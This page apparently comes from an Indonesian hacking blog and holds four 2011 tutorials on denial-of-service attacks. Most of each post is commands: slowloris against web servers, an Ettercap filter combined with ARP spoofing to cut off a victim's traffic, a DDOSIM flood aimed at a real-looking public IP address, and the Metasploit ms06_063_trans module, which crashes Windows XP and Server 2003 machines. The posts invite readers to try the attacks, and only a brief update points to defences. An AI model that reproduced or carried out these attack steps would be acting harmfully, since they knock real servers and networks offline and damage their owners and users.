Showing posts with label Dos. Show all posts
Showing posts with label Dos. Show all posts

Friday, October 28, 2011

Serangan Dos kepada Webserver

Serangan pada webserver banyak sekali dirasakan oleh pihak pengelola webserver, dan harus bekerja ekstra untuk memperbaiki semua sistem yang telah terkena serangan dos. Pernahkah sahabat melakukan serangan DOS kepada webserver? kalau belum mari kita latihan untuk melakukan serangan dos. Disini saya menggunakan 2 buah file yang pertama lbd.sh yang berguna untuk melihat apakah webserver tersebut menggunakan load-balancing atau tidak, yang kedua adalah slowloris.pl yang digunakan untuk melakukan serangan dos.

1. Download file lbd.sh dan slowloris.pl disini, kemudian unrar.

2. Cek Load-Balancing dari webserver target.
root@bt:~# cd dos
root@bt:~# ./lbd.sh IP_TARGET
Contoh :
root@bt:~/dos# ./lbd.sh 10.3.0.67

lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
                                    Written by Stefan Behte (http://ge.mine.nu)
                                    Proof-of-concept! Might give false positives.

Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]: 
 Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
 NOT FOUND

Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

10.3.0.67 does NOT use Load-balancing.

root@bt:~/dos# 
Jika jawabannya adalah "10.3.0.67 does NOT use Load-balancing." maka kita akan melakukan serangan dos.

3. Serangan Dos.
root@bt:~/dos# ./slowloris.pl -dns IP_TARGET
* Untuk tipe serangan yang lain bisa dilihat didalam file slowloris.pl.

Berikut Videonya.








Update !

Mungkin dengan adanya artikel ini akan membuat beberapa webserver dirugikan, berikut beberapa tutorial yang saya kira dapat memberikan sedikit proteksi pada webservernya.

1. http://www.pc-freak.net/blog/protecting-debian-lenny-against-slowloris-denial-of-service-attack-with-mod_antiloris/
2. http://lwn.net/Articles/338407/

Monday, September 5, 2011

Denial Of Services dengan Ettercap

Dulu Ane pernah buat tulisan tentang DOS dengan metasploit, sekarang ane akan kasih tau cara melakukan DOS menggunakan Ettercap, tanpa basa-basi kita landsung meluncur keTKP.

1. Buka Gedit (atau file editor apapun) kemudian tulis perintah copas perintah dibawah ini.

if(ip.src == 'IP_TARGET' || ip.dst == 'IP_TARGET') {
drop();
kill();
msg("Gilakomputer mencoba menyerang !!\n");
}

ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft


2. Convert file dos.eft menjadi dos.ef

etterfilter dos.eft -o dos.ef


3. Lakukan serangan

ettercap -T -q -F /root/dos.ef -M ARP /IP_TARGET/ // -i kartu_jaringan


Jika Sikorban mengakses Internet maka akan muncul tampilan seperti ini.


Dan ini adalah hasil dari kelakuan kalian

Windows XP


Windows 7 yang juga ikut KO


semoga tutorial ini jadi pelajaran ya buat kita.

Monday, August 8, 2011

DDOSIM, DDOS layer 7 in Backtrack 5

Download ddosim di http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download
untuk yang belum punya libnet0-dev, install dulu dan langsung install ddosim nya

root@bt:~# apt-get install libnet0-dev
root@bt:~/ddosim# ./configure
root@bt:~/ddosim# make
root@bt:~/ddosim# make install

petunjuk penggunaan

# DDOSIM:  Layer 7 DDoS Simulator v0.2
Usage: ddosim
                 -d IP           Target IP address
                 -p PORT         Target port
                [-k NET]         Source IP from class C network (ex. 10.4.4.0)
                [-i IFNAME]      Output interface name
                [-c COUNT]       Number of connections to establish
                [-w DELAY]       Delay (in milliseconds) between SYN packets
                [-r TYPE]        Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
                [-t NRTHREADS]   Number of threads to use when sending packets (default 1)
                [-n]             Do not spoof source address (use local address)
                [-v]             Verbose mode (slower)
                [-h]             Print this help message

contoh untuk ddos port 80 dengan type http_invalid dan serangan count 0 (atau unlimited) dan thread serangan 3
root@bt:~# ddosim -d 110.139.19.196 -p 80 -r HTTP_INVALID -c 0 -t 3
kesimpulan:
- DDOS modem speedy dengan type serangan http_invalid hanya butuh koneksi 10KBps
- DDOS mikrotik (kemungkinan besar RB) dengan koneksi mikrotik tsb dibawah koneksi si attacker, mengabitkan DROP connection.

Sunday, February 27, 2011

Denial of Service dengan Metasploit

Denial Of Service atau biasa disingkat dengan DOS adalah sebuah serangan yang dilakukan untuk melumpuhkan sebuah sistem atau jaringan untuk maksud-maksud tertentu dengan jalan mengirimkan paket dalam jumlah yang sangat banyak, sehingga Sistem atau Jaringan yang menerima paket-paket tersebut manjadi crash.
Berikut adalah serangan DOS menggunakan kelemahan yang terdapat pada SVR.SYS yang betugas sebagai driver sistem operasi windows.

Requirements :
BackTrack OS
Metasploit Framework

Target :
Windows XP SP 2
Windows server 2003

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.
  1. Jalankan metasploit.
    root@bt:~# msfconsole
  2. Cek pada Port 445 dari komputer target apakah terbuka atau tidak.
    root@bt:~# nmap IP_TARGET
  3. Jalankan perintah dibawah ini untuk melakukan serangan.
    use dos/windows/smb/ms06_063_trans
    set LPORT 445
    set RHOST IP_TARGET
    run
  4. Jika Serangan berhasil dilakukan maka komputer target akan mengalami Blue Screen Of Death.
Type : Tutorial
Level : Easy

Search Keyword :
Serangan dos menggunakan metasploit, Denial of Service dengan Metasploit, dos/windows/smb/ms06_063_trans, bluescreen dengan metasploit

 
biz.